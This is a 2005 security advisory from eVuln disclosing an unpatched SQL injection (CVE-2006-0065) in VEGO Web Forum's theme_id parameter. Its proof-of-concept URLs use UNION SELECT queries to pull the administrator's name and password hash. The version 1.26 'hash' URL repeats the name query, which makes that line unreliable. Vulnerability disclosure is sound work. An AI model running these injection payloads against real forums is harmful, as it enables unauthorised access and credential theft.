SQL Injection Vulnerability in VEGO Web Forum

Summary

Vulnerability
SQL Injection Vulnerability in VEGO Web Forum
Discovered
2005.12.28
Last Update
0 n/a
ID
EV0001
CVE
CVE-2006-0065
Risk Level
medium
Type
SQL Injection
Status
Unpatched
Vendor
VEGO (http://alas.matf.bg.ac.yu/~mr99067)
Vulnerable Software
VEGO Web Forum
Version
1.26 and earlier
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in VEGO Web Forum script.

Vulnerable scripts:

  • php/functions.php
  • php/functions_update.php
  • php/functions_display.php

Variable theme_id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Administrator's authentication is threatened.

PoC/Exploit

Administrator's login name.

For version 1.26:
http://hostname/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*

Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4%20from%20vwf_users%20where%20userid=1/*

Hash of administrator's password.

For version 1.26:
http://hostname/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*

Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1%20union%20select%201,2,pass,4%20from%20vwf_users%20where%20userid=1/*

Solution.

Solution for "SQL Injection Vulnerability in VEGO Web Forum" is not available. Check VEGO website for updates.